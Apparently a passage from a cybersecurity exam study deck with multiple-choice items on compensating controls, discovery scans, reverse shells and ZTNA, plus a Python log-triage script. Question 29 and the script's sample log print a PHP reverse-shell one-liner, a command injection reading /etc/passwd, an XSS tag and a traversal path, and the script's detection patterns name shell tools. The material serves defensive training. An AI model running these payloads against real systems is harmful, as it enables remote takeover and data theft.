In some cases, security professionals may not be able to implement all of the desired security controls due to technical, operational, or financial reasons. For example, an organization may not be able to upgrade the operating system on retail point-of-sale (POS) terminals due to an incompatibility with the POS software. In these cases, security professionals should seek out compensating controls designed to provide a similar level of security using alternate means. In the POS example, administrators might place the POS terminals on a segmented, isolated network and use intrusion prevention systems to monitor network traffic for any attempt to exploit an unpatched vulnerability and block it from reaching the vulnerable host. This meets the same objective of protecting the POS terminal from compromise and serves as a compensating control.

28
Q

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

A

Selected Answer: B
Correct
A discovery scan is typically used to identify the scope of a web application and understand where the scan will go. This type of scan is often the first step in assessing a web application’s security and helps the analyst determine which areas should be further examined or tested in-depth.

29
Q

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r '$socket=fsockopen("10.0.0.1", 1234); passthru("/bin/sh -i <&3 >&3 2>&3");'

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

A

Selected Answer: D

The line is a one-line PHP reverse shell. fsockopen() opens a TCP connection from the web server out to the attacker's host 10.0.0.1 on port 1234; in a fresh php -r process that socket becomes file descriptor 3 (the first free descriptor after stdin, stdout and stderr), and passthru() then runs /bin/sh -i with its input, output and error streams redirected to that descriptor (<&3 >&3 2>&3). The attacker's listener on 10.0.0.1:1234 receives an interactive shell on the web server.

Don't pick B. Command injection is typically how such a line gets executed in the first place, but the question asks what is being attempted, and the goal of the payload is to create a reverse shell on the victim's machine. Remote file inclusion and server-side request forgery do not fit the line at all.
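The web-log questions above (17: odd characters in request lines, 18: the ;cat /etc/passwd command injection, 20: the vbscript: image tag, 29: the PHP reverse shell) all reduce to the same analyst task: decode the request and recognize the pattern. This added example, not code from the deck, does that over a constructed sample log: each line is parsed as Apache/nginx combined format, the request target is URL-decoded twice to catch double encoding, and a small signature set classifies it as command injection, reverse shell, cross-site scripting or directory traversal. The log lines, hosts and timestamps are constructed, not taken from the original questions' (missing) screenshots.

```python
"""Added example: triage suspicious request lines in web server logs."""
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures applied to the decoded request target. Command injection requires a
# shell metacharacter followed by a command name, so a bare /etc/passwd inside a
# traversal path does not trigger it.
SIGNATURES = {
    "command injection": re.compile(
        r"(?:;|\||&&|`|\$\()\s*(?:cat|ls|id|whoami|uname|wget|curl|nc|bash|sh|python|perl|php)\b",
        re.I),
    "reverse shell": re.compile(
        r"fsockopen\(|/bin/(?:ba)?sh\s+-i|/dev/tcp/|\bnc\b[^;]*\s-e\s|<&\d\s*>&\d", re.I),
    "cross-site scripting": re.compile(
        r"<\s*(?:script|img|svg|iframe|body)\b|(?:java|vb)script:|\bon(?:error|load|mouseover)\s*=",
        re.I),
    "directory traversal": re.compile(r"(?:\.\./|\.\.\\){2,}"),
}

# Constructed sample: identical timestamps, one benign request and four attacks.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/index.cgi?name=John HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/index.cgi?name=John;cat%20/etc/passwd HTTP/1.1" 200 1984',
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=%3CIMG%20SRC%3D%27vbscript:msgbox(%22test%22)%27%3E HTTP/1.1" 200 733',
    '10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1" 403 199',
    '10.0.0.7 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?cmd=php%20-r%20%27%24socket%3Dfsockopen(%2210.0.0.1%22,%201234)%3B%20passthru(%22/bin/sh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27 HTTP/1.1" 200 0',
]


def decode_target(target: str) -> str:
    """URL-decode twice so double-encoded payloads (%252e%252e) are also seen."""
    return unquote_plus(unquote_plus(target))


def classify_line(line: str) -> dict:
    """Parse one log line and return the matching signature names (possibly none).
    Lines that are not in combined format are scanned whole."""
    m = LOG_RE.match(line)
    if m:
        ip, target = m.group("ip"), m.group("target")
    else:
        ip, target = "?", line
    decoded = decode_target(target)
    hits = [name for name, pattern in SIGNATURES.items() if pattern.search(decoded)]
    return {"ip": ip, "target": decoded, "indicators": hits}


def scan_log(lines) -> list:
    """Return only the lines with at least one indicator, in log order."""
    return [r for r in (classify_line(line) for line in lines) if r["indicators"]]


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(f"{r['ip']:<10} {', '.join(r['indicators']):<22} {r['target']}")
```

Decoding before matching is the step that matters for question 17: the "odd characters" in a request line are usually percent-encoded metacharacters, and only the decoded form tells you whether they spell a command, a script tag or a traversal. Signature lists like this one are a triage aid, not a detection product; the classified lines still need the rest of the investigation (status codes, response sizes, what the application did with the input) before they become an incident.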

30
Q

When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

A. CASB
B. SASE
C. ZTNA
D. SWG

A

Selected Answer: C

ZTNA provides secure access to applications based on clearly defined, identity- and device-aware access policies, no matter where the user or the application resides. It simplifies extending IAM to SaaS because authentication and authorization are enforced once, in a policy layer that fronts every application, rather than integrated application by application; only authenticated and authorized users and devices reach the applications and data. ZTNA also enforces the principle of least privilege, a key component of IAM.

A CASB adds visibility and data-protection controls over SaaS use, an SWG filters web traffic, and SASE is the broader architecture that bundles these services (ZTNA included) with networking. None of them addresses the identity and access problem the administrators struggled with as directly as ZTNA does.
